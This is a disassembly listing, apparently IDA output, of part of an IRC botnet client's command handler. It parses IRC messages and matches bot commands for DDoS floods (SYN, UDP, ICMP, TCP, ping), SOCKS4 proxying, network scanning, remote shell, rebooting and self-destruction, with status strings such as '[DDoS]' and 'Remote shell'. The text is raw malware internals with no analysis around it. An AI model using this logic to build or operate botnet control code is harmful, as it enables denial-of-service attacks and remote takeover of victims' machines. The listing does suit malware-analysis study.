test cl, cl
jnz short loc_408F23
loc_408F41: ; CODE XREF: sub_408A18+515�j
xor eax, eax
jmp short loc_408F4A
; ---------------------------------------------------------------------------
loc_408F45: ; CODE XREF: sub_408A18+511�j
; sub_408A18+51F�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_408F4A: ; CODE XREF: sub_408A18+52B�j
test eax, eax
jz short loc_408F5F
loc_408F4E: ; CODE XREF: sub_408A18+501�j
inc edi
add edx, 80h
cmp edi, 2
jl short loc_408F16
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_408F5F: ; CODE XREF: sub_408A18+534�j
lea eax, [ebp+var_B40]
push 21h
push eax
call sub_415A90
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_408C96
mov ecx, [ebp+arg_0]
lea edx, [ecx+1]
loc_408F7F: ; CODE XREF: sub_408A18+56C�j
mov al, [ecx]
inc ecx
test al, al
jnz short loc_408F7F
sub ecx, edx
mov edx, ebx
lea esi, [edx+1]
loc_408F8D: ; CODE XREF: sub_408A18+57A�j
mov al, [edx]
inc edx
test al, al
jnz short loc_408F8D
sub edx, esi
add edx, ecx
cmp edx, 7Eh
ja loc_408C96
push ebx
push [ebp+arg_0]
shl edi, 7
add edi, [ebp+arg_18]
push offset aSS_3 ; ":%s%s"
push edi
call sub_4145E5
push 0
push 0
lea eax, [ebp+var_420]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4056FB
add esp, 24h
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_408FD4: ; CODE XREF: sub_408A18+3EE�j
mov edi, [ebp+var_A4]
mov ebx, offset aPart ; "PART"
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_408FFE
mov edi, [ebp+var_A4]
push 5
mov esi, offset aQuit ; "QUIT"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40904E
loc_408FFE: ; CODE XREF: sub_408A18+5D0�j
mov esi, [ebp+arg_18]
xor eax, eax
mov [ebp+var_10], esi
loc_409006: ; CODE XREF: sub_408A18+634�j
cmp byte ptr [esi], 0
jz short loc_40903C
mov edi, [ebp+var_A8]
loc_409011: ; CODE XREF: sub_408A18+615�j
mov dl, [esi]
mov cl, dl
cmp dl, [edi]
jnz short loc_409033
test cl, cl
jz short loc_40902F
mov dl, [esi+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_409033
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_409011
loc_40902F: ; CODE XREF: sub_408A18+603�j
xor ecx, ecx
jmp short loc_409038
; ---------------------------------------------------------------------------
loc_409033: ; CODE XREF: sub_408A18+5FF�j
; sub_408A18+60D�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_409038: ; CODE XREF: sub_408A18+619�j
test ecx, ecx
jz short loc_409091
loc_40903C: ; CODE XREF: sub_408A18+5F1�j
mov esi, [ebp+var_10]
inc eax
add esi, 80h
cmp eax, 2
mov [ebp+var_10], esi
jl short loc_409006
loc_40904E: ; CODE XREF: sub_408A18+5E4�j
mov edi, [ebp+var_A4]
push 4
mov esi, offset a353 ; "353"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_409112
mov esi, [ebp+var_98]
mov eax, [ebp+arg_8]
loc_40906F: ; CODE XREF: sub_408A18+673�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_4090F0
test cl, cl
jz short loc_40908D
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_4090F0
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40906F
loc_40908D: ; CODE XREF: sub_408A18+661�j
xor eax, eax
jmp short loc_4090F5
; ---------------------------------------------------------------------------
loc_409091: ; CODE XREF: sub_408A18+622�j
mov ecx, [ebp+arg_18]
shl eax, 7
and byte ptr [eax+ecx], 0
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLog_0 ; "[MAIN]: User: %s logged out."
push eax
call sub_4145E5
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
mov edi, [ebp+var_A4]
add esp, 10h
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jnz loc_408C96
lea eax, [ebp+var_2F0]
push eax
mov eax, [ebp+var_A8]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_408BEF
; ---------------------------------------------------------------------------
loc_4090F0: ; CODE XREF: sub_408A18+65D�j
; sub_408A18+66B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4090F5: ; CODE XREF: sub_408A18+677�j
test eax, eax
jnz short loc_409102
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_409102: ; CODE XREF: sub_408A18+6DF�j
push [ebp+var_98]
push offset aMainJoinedChan ; "[MAIN]: Joined channel: %s."
jmp loc_40E6F1
; ---------------------------------------------------------------------------
loc_409112: ; CODE XREF: sub_408A18+648�j
mov edi, [ebp+var_A4]
mov eax, offset aPrivmsg ; "PRIVMSG"
push 8
xor edx, edx
mov esi, eax
pop ecx
repe cmpsb
mov edx, offset aNotice ; "NOTICE"
jz short loc_409162
mov edi, [ebp+var_A4]
push 7
mov esi, edx
pop ecx
xor ebx, ebx
repe cmpsb
jz short loc_409162
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427964
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40E538
cmp dword_42BEC8, ebx
jz loc_40E538
loc_409162: ; CODE XREF: sub_408A18+713�j
; sub_408A18+724�j
mov edi, [ebp+var_A4]
mov ebx, [ebp+var_20]
mov esi, eax
push 8
pop ecx
xor eax, eax
repe cmpsb
jz loc_409264
mov edi, [ebp+var_A4]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jz loc_409264
mov eax, [ebp+var_9C]
inc [ebp+var_98]
mov [ebp+var_20], 4
mov [ebp+var_A0], eax
loc_4091A8: ; CODE XREF: sub_408A18+90A�j
; sub_408A18+949�j ...
mov ebx, [ebp+var_20]
shl ebx, 2
lea eax, [ebp+ebx+var_A8]
mov ecx, [eax]
lea edx, [ecx+1]
mov [eax], edx
mov al, byte_42BED0
cmp [ecx], al
mov [ebp+var_28], edx
jnz loc_408C96
push 6
mov edi, edx
mov esi, offset aLogin ; "login"
pop ecx
xor eax, eax
repe cmpsb
jz loc_40E540
push 2
mov edi, edx
mov esi, offset dword_427960
pop ecx
xor eax, eax
repe cmpsb
jz loc_40E540
cmp [ebp+var_1C], eax
jnz short loc_409211
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427964
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40E538
loc_409211: ; CODE XREF: sub_408A18+7DF�j
xor eax, eax
cmp [ebp+arg_28], eax
jnz loc_40E538
cmp dword_42C2F8, eax
mov [ebp+var_10], eax
jle loc_409523
mov [ebp+var_1C], offset dword_47B378
loc_409232: ; CODE XREF: sub_408A18+994�j
mov edi, [ebp+var_1C]
mov esi, edx
loc_409237: ; CODE XREF: sub_408A18+843�j
mov cl, [edi]
mov al, cl
cmp cl, [esi]
jnz loc_409390
test al, al
jz short loc_40925D
mov cl, [edi+1]
mov al, cl
cmp cl, [esi+1]
jnz loc_409390
inc edi
inc edi
inc esi
inc esi
test al, al
jnz short loc_409237
loc_40925D: ; CODE XREF: sub_408A18+82D�j
xor eax, eax
jmp loc_409395
; ---------------------------------------------------------------------------
loc_409264: ; CODE XREF: sub_408A18+75C�j
; sub_408A18+771�j
mov edi, [ebp+var_A4]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40927C
mov [ebp+var_4], 1
loc_40927C: ; CODE XREF: sub_408A18+85B�j
cmp [ebp+var_A0], 0
jz loc_408C96
push offset dword_42795C
push [ebp+var_A0]
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz short loc_4092A5
cmp [ebp+var_4], 0
jz short loc_4092B1
loc_4092A5: ; CODE XREF: sub_408A18+885�j
lea eax, [ebp+var_F0]
mov [ebp+var_A0], eax
loc_4092B1: ; CODE XREF: sub_408A18+88B�j
cmp [ebp+var_9C], 0
jz loc_408C96
inc [ebp+var_9C]
jz short loc_409300
cmp [ebp+arg_10], 0
jz short loc_409300
lea eax, [ebp+var_3BC]
lea edx, [eax+1]
loc_4092D5: ; CODE XREF: sub_408A18+8C2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4092D5
sub eax, edx
push eax
push [ebp+var_9C]
lea eax, [ebp+var_3BC]
push eax
call sub_415EE0
add esp, 0Ch
mov ebx, eax
neg ebx
sbb ebx, ebx
add ebx, 4
mov [ebp+var_20], ebx
loc_409300: ; CODE XREF: sub_408A18+8AC�j
; sub_408A18+8B2�j
mov eax, ebx
shl eax, 2
mov edx, [ebp+eax+var_A8]
test edx, edx
jz loc_408C96
push 0Ah
mov edi, edx
mov esi, offset dword_427950
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_4091A8
mov esi, [ebp+var_A0]
mov bl, [esi]
cmp bl, 23h
jz short loc_409353
mov ecx, dword_47BF08
mov ecx, off_42BFB4[ecx*4]
cmp byte ptr [ecx], 0
jz short loc_409353
push ecx
push esi
push offset dword_427934
jmp loc_408BEF
; ---------------------------------------------------------------------------
loc_409353: ; CODE XREF: sub_408A18+91B�j
; sub_408A18+92D�j
mov edi, edx
push 6
mov esi, offset dword_42792C
pop ecx
xor edx, edx
repe cmpsb
jnz loc_4091A8
mov eax, [ebp+eax+var_A4]
test eax, eax
jz loc_4091A8
cmp bl, 23h
jz loc_4091A8
push eax
push [ebp+var_A0]
push offset dword_427914
jmp loc_408BEF
; ---------------------------------------------------------------------------
loc_409390: ; CODE XREF: sub_408A18+825�j
; sub_408A18+837�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_409395: ; CODE XREF: sub_408A18+847�j
test eax, eax
jz short loc_4093B7
inc [ebp+var_10]
mov eax, [ebp+var_10]
add [ebp+var_1C], 0B8h
cmp eax, dword_42C2F8
jl loc_409232
jmp loc_409523
; ---------------------------------------------------------------------------
loc_4093B7: ; CODE XREF: sub_408A18+97F�j
push offset asc_425A50 ; " :"
push [ebp+arg_0]
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz loc_408C96
mov esi, [ebp+var_10]
mov cl, byte_42BED0
imul esi, 0B8h
mov [eax+2], cl
mov cl, byte_42BED0
mov [eax+3], cl
push 9Fh
lea ecx, dword_47B390[esi]
push ecx
add eax, 4
push eax
call sub_414670
lea eax, dword_47B378[esi]
lea edi, [ebp+ebx+var_68]
add esp, 0Ch
mov [ebp+var_10], 0Fh
mov [ebp+var_1C], eax
mov esi, edi
loc_409417: ; CODE XREF: sub_408A18+AA3�j
push [ebp+var_10]
lea eax, [ebp+var_C8]
push offset aD_1 ; "$%d-"
push eax
call sub_4145E5
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_4150B0
add esp, 14h
test eax, eax
jz short loc_409480
cmp dword ptr [esi], 0
jz short loc_409485
mov eax, [ebp+var_1C]
lea edx, [eax+1]
loc_40944C: ; CODE XREF: sub_408A18+A39�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40944C
sub eax, edx
add [ebp+var_14], eax
jz short loc_4094B1
push dword ptr [esi-4]
push [ebp+var_14]
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz short loc_4094B1
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_40668C
add esp, 0Ch
jmp short loc_4094B1
; ---------------------------------------------------------------------------
loc_409480: ; CODE XREF: sub_408A18+A27�j
cmp dword ptr [esi], 0
jnz short loc_4094B1
loc_409485: ; CODE XREF: sub_408A18+A2C�j
push 2
lea eax, [ebp+var_C8]
push eax
lea eax, [ebp+var_24]
push eax
call sub_414670
and [ebp+var_22], 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_40668C
add esp, 18h
loc_4094B1: ; CODE XREF: sub_408A18+A40�j
; sub_408A18+A51�j ...
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg loc_409417
mov [ebp+var_10], 10h
mov esi, edi
loc_4094CA: ; CODE XREF: sub_408A18+AFF�j
push [ebp+var_10]
lea eax, [ebp+var_C8]
push offset aD_0 ; "$%d"
push eax
call sub_4145E5
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_4150B0
add esp, 14h
test eax, eax
jz short loc_40950D
mov eax, [esi]
test eax, eax
jz short loc_40950D
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_40668C
add esp, 0Ch
loc_40950D: ; CODE XREF: sub_408A18+ADA�j
; sub_408A18+AE0�j
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg short loc_4094CA
mov edx, [ebp+var_28]
mov [ebp+var_C], 1
loc_409523: ; CODE XREF: sub_408A18+80D�j
; sub_408A18+99A�j
mov al, byte_42BED0
cmp [edx], al
jz short loc_409536
cmp [ebp+var_C], 0
jz loc_40970C
loc_409536: ; CODE XREF: sub_408A18+B12�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_40668C
lea eax, [ebp+var_F0]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_40668C
push [ebp+var_A0]
push offset aChan ; "$chan"
push edi
call sub_40668C
push 0
push 0
lea eax, [ebp+var_C8]
push 2
push eax
call sub_40FD06
push eax
push offset aRndnick_0 ; "$rndnick"
push edi
call sub_40668C
add esp, 40h
push [ebp+arg_14]
push offset aServer_1 ; "$server"
push edi
call sub_40668C
mov esi, offset aChr ; "$chr("
push esi
push edi
call sub_4150B0
add esp, 14h
jmp loc_409690
; ---------------------------------------------------------------------------
loc_4095AD: ; CODE XREF: sub_408A18+C7A�j
push esi
push [ebp+arg_0]
call sub_4150B0
mov [ebp+var_28], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_C8]
push eax
call sub_414670
lea eax, [ebp+var_C8]
push offset asc_4278D4 ; ")"
push eax
call sub_415459
add esp, 1Ch
cmp [ebp+var_C8], 30h
jl short loc_4095F1
cmp [ebp+var_C8], 39h
jle short loc_409607
loc_4095F1: ; CODE XREF: sub_408A18+BCE�j
push 3
lea eax, [ebp+var_C8]
push offset a63 ; "63"
push eax
call sub_414670
add esp, 0Ch
loc_409607: ; CODE XREF: sub_408A18+BD7�j
lea eax, [ebp+var_C8]
push eax
call sub_414972
test eax, eax
pop ecx
jle short loc_40962A
lea eax, [ebp+var_C8]
push eax
call sub_414972
pop ecx
mov [ebp+var_24], al
jmp short loc_40963B
; ---------------------------------------------------------------------------
loc_40962A: ; CODE XREF: sub_408A18+BFE�j
call sub_4147A1
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_24], dl
loc_40963B: ; CODE XREF: sub_408A18+C10�j
and [ebp+var_23], 0
lea eax, [ebp+var_C8]
lea edx, [eax+1]
loc_409648: ; CODE XREF: sub_408A18+C35�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_409648
sub eax, edx
mov ecx, eax
xor eax, eax
lea edi, [ebp+var_C8]
stosd
stosd
add ecx, 6
push ecx
push [ebp+var_28]
stosd
lea eax, [ebp+var_C8]
push eax
call sub_414670
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_0]
call sub_40668C
push esi
push [ebp+arg_0]
call sub_4150B0
add esp, 20h
loc_409690: ; CODE XREF: sub_408A18+B90�j
test eax, eax
jnz loc_4095AD
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea eax, [ebp+var_1F70]
push eax
call sub_414670
push esi
lea eax, [ebp+var_1F70]
push eax
lea eax, [ebp+var_2270]
push eax
call sub_414670
mov esi, offset asc_420AE8 ; " "
lea eax, [ebp+var_2270]
push esi
push eax
call sub_415459
xor edi, edi
add esp, 20h
mov [ebp+var_A8], eax
inc edi
loc_4096DF: ; CODE XREF: sub_408A18+CDC�j
push esi
push 0
call sub_415459
mov [ebp+edi*4+var_A8], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_4096DF
lea eax, [ebp+ebx+var_A8]
mov ecx, [eax]
test ecx, ecx
jz loc_408C96
add ecx, 3
mov [eax], ecx
loc_40970C: ; CODE XREF: sub_408A18+B18�j
mov eax, [ebp+ebx+var_A8]
push 8
mov edi, eax
mov esi, offset aRndnick ; "rndnick"
pop ecx
xor edx, edx
repe cmpsb
mov [ebp+var_1C], eax
jz loc_40E4EB
push 3
mov edi, eax
mov esi, offset aRn ; "rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4EB
push 4
mov edi, eax
mov esi, offset aDie ; "die"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DA39
push 2
mov edi, eax
mov esi, offset aD ; "d"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DA39
push 7
mov edi, eax
mov esi, offset aLogout ; "logout"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D94B
push 3
mov edi, eax
mov esi, offset aLo ; "lo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D94B
push 8
mov edi, eax
mov esi, offset aVersion ; "version"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D92D
push 4
mov edi, eax
mov esi, offset aVer ; "ver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D92D
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D82E
push 4
mov edi, eax
mov esi, offset aSec ; "sec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D82E
push 9
mov edi, eax
mov esi, offset aUnsecure ; "unsecure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D82E
push 6
mov edi, eax
mov esi, offset aUnsec ; "unsec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D82E
push 7
mov edi, eax
mov esi, offset aSocks4 ; "socks4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D709
push 3
mov edi, eax
mov esi, offset aS4 ; "s4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D709
push 0Bh
mov edi, eax
mov esi, offset aSocks4stop ; "socks4stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409856
push [ebp+ebx+var_A4]
push 12h
push offset aServer_0 ; "Server"
push offset aSocks4_0 ; "[SOCKS4]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_409856: ; CODE XREF: sub_408A18+E24�j
push 0Bh
mov edi, eax
mov esi, offset aRloginstop ; "rloginstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40987E
push [ebp+ebx+var_A4]
push 7
push offset aServer_0 ; "Server"
push offset aRlogind ; "[RLOGIND]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_40987E: ; CODE XREF: sub_408A18+E4C�j
push 9
mov edi, eax
mov esi, offset aHttpstop ; "httpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4098A6
push [ebp+ebx+var_A4]
push 4
push offset aServer_0 ; "Server"
push offset aHttpd ; "[HTTPD]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_4098A6: ; CODE XREF: sub_408A18+E74�j
push 8
mov edi, eax
mov esi, offset aLogstop ; "logstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4098CE
push [ebp+ebx+var_A4]
push 1Dh
push offset aLogList ; "Log list"
push offset aLog ; "[LOG]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_4098CE: ; CODE XREF: sub_408A18+E9C�j
push 0Dh
mov edi, eax
mov esi, offset aRedirectstop ; "redirectstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4098F6
push [ebp+ebx+var_A4]
push 11h
push offset aTcpRedirect ; "TCP redirect"
push offset aRedirect_0 ; "[REDIRECT]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_4098F6: ; CODE XREF: sub_408A18+EC4�j
push 0Ah
mov edi, eax
mov esi, offset aDdos_stop ; "ddos.stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40991E
push [ebp+ebx+var_A4]
push 0Bh
push offset aDdosFlood ; "DDoS flood"
push offset aDdos ; "[DDoS]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_40991E: ; CODE XREF: sub_408A18+EEC�j
push 8
mov edi, eax
mov esi, offset aSynstop ; "synstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409946
push [ebp+ebx+var_A4]
push 0Ch
push offset aSynFlood ; "Syn flood"
push offset aSyn_0 ; "[SYN]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_409946: ; CODE XREF: sub_408A18+F14�j
push 8
mov edi, eax
mov esi, offset aUdpstop ; "udpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40996E
push [ebp+ebx+var_A4]
push 10h
push offset aUdpFlood ; "UDP flood"
push offset aUpd ; "[UPD]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_40996E: ; CODE XREF: sub_408A18+F3C�j
push 9
mov edi, eax
mov esi, offset aPingstop ; "pingstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409996
push [ebp+ebx+var_A4]
push 0Fh
push offset aPingFlood ; "Ping flood"
push offset aPing_1 ; "[PING]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_409996: ; CODE XREF: sub_408A18+F64�j
push 9
mov edi, eax
mov esi, offset aIcmpstop ; "icmpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4099BE
push [ebp+ebx+var_A4]
push 0Eh
push offset aIcmpFlood ; "ICMP flood"
loc_4099B4: ; CODE XREF: sub_408A18+FC4�j
push offset aIcmp_0 ; "[ICMP]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_4099BE: ; CODE XREF: sub_408A18+F8C�j
push 8
mov edi, eax
mov esi, offset aTcpstop ; "tcpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4099DE
push [ebp+ebx+var_A4]
push 0Dh
push offset aTcpFlood ; "TCP flood"
jmp short loc_4099B4
; ---------------------------------------------------------------------------
loc_4099DE: ; CODE XREF: sub_408A18+FB4�j
push 9
mov edi, eax
mov esi, offset aTftpstop ; "tftpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409A06
push [ebp+ebx+var_A4]
push 5
push offset aServer_0 ; "Server"
push offset aTftp_0 ; "[TFTP]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_409A06: ; CODE XREF: sub_408A18+FD4�j
push 0Dh
mov edi, eax
mov esi, offset aFindfilestop ; "findfilestop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D6DA
push 7
mov edi, eax
mov esi, offset aFfstop ; "ffstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D6DA
push 0Ah
mov edi, eax
mov esi, offset aProcsstop ; "procsstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D6C5
push 7
mov edi, eax
mov esi, offset aPsstop ; "psstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D6C5
push 0Ah
mov edi, eax
mov esi, offset aClonestop ; "clonestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409A7E
push [ebp+ebx+var_A4]
push 18h
push offset aClone ; "Clone"
push offset aClones ; "[CLONES]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_409A7E: ; CODE XREF: sub_408A18+104C�j
push 0Bh
mov edi, eax
mov esi, offset aSecurestop ; "securestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409AA6
push [ebp+ebx+var_A4]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset aSecure_1 ; "[SECURE]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_409AA6: ; CODE XREF: sub_408A18+1074�j
push 9
mov edi, eax
mov esi, offset aScanstop ; "scanstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409ACE
push [ebp+ebx+var_A4]
push 9
push offset aScan_1 ; "Scan"
push offset aScan_0 ; "[SCAN]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
loc_409ACE: ; CODE XREF: sub_408A18+109C�j
push 0Ah
mov edi, eax
mov esi, offset aScanstats ; "scanstats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D6AC
push 6
mov edi, eax
mov esi, offset aStats ; "stats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D6AC
push 0Ah
mov edi, eax
mov esi, offset aReconnect ; "reconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D68B
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D68B
push 0Bh
mov edi, eax
mov esi, offset aDisconnect ; "disconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D669
push 3
mov edi, eax
mov esi, offset aDc ; "dc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D669
push 5
mov edi, eax
mov esi, offset aQuit_0 ; "quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D61F
push 2
mov edi, eax
mov esi, offset aQ ; "q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D61F
push 7
mov edi, eax
mov esi, offset aStatus ; "status"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5E0
push 2
mov edi, eax
mov esi, offset aS_4 ; "s"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5E0
push 3
mov edi, eax
mov esi, offset aId ; "id"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5A8
push 2
mov edi, eax
mov esi, offset aI_0 ; "i"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5A8
push 7
mov edi, eax
mov esi, offset aReboot ; "reboot"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409C10
call sub_406A11
test eax, eax
mov eax, offset aMainRebootingS ; "[MAIN]: Rebooting system."
jnz short loc_409BE1
mov eax, offset aMainFailedToRe ; "[MAIN]: Failed to reboot system."
loc_409BE1: ; CODE XREF: sub_408A18+11C2�j
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 1Ch
jmp loc_40DA31
; ---------------------------------------------------------------------------
loc_409C10: ; CODE XREF: sub_408A18+11B4�j
push 8
mov edi, eax
mov esi, offset aThreads ; "threads"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D4B9
push 2
mov edi, eax
mov esi, offset aT ; "t"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D4B9
push 8
mov edi, eax
mov esi, offset aAliases ; "aliases"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D496
push 3
mov edi, eax
mov esi, offset aAl ; "al"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D496
push 4
mov edi, eax
mov esi, offset aLog_0 ; "log"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D3A3
push 3
mov edi, eax
mov esi, offset aLg ; "lg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D3A3
push 9
mov edi, eax
mov esi, offset aClearlog ; "clearlog"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D387
push 4
mov edi, eax
mov esi, offset aClg ; "clg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D387
push 8
mov edi, eax
mov esi, offset aNetinfo ; "netinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D34C
push 3
mov edi, eax
mov esi, offset aNi ; "ni"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D34C
push 8
mov edi, eax
mov esi, offset aSysinfo ; "sysinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D320
push 3
mov edi, eax
mov esi, offset aSi ; "si"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D320
push 8
mov edi, eax
mov esi, offset aDestroy ; "destroy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D2A3
push 0Bh
mov edi, eax
mov esi, offset aErradicate ; "erradicate"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D2A3
push 6
mov edi, eax
mov esi, offset aProcs ; "procs"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D17D
push 3
mov edi, eax
mov esi, offset aPs ; "ps"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D17D
push 7
mov edi, eax
mov esi, offset aUptime ; "uptime"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D0F6
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D0F6
push 0Ah
mov edi, eax
mov esi, offset aDriveinfo ; "driveinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D0D9
push 4
mov edi, eax
mov esi, offset aDrv ; "drv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D0D9
push 9
mov edi, eax
mov esi, offset aTestdlls ; "testdlls"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D0C0
push 4
mov edi, eax
mov esi, offset aDll ; "dll"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D0C0
push 8
mov edi, eax
mov esi, offset aOpencmd ; "opencmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D081
push 5
mov edi, eax
mov esi, offset aOcmd ; "ocmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D081
push 8
mov edi, eax
mov esi, offset aCmdstop ; "cmdstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_409E18
push [ebp+ebx+var_A4]
push 8
push offset aRemoteShell ; "Remote shell"
push offset aCmd_0 ; "[CMD]"
jmp loc_40D6ED
; ---------------------------------------------------------------------------
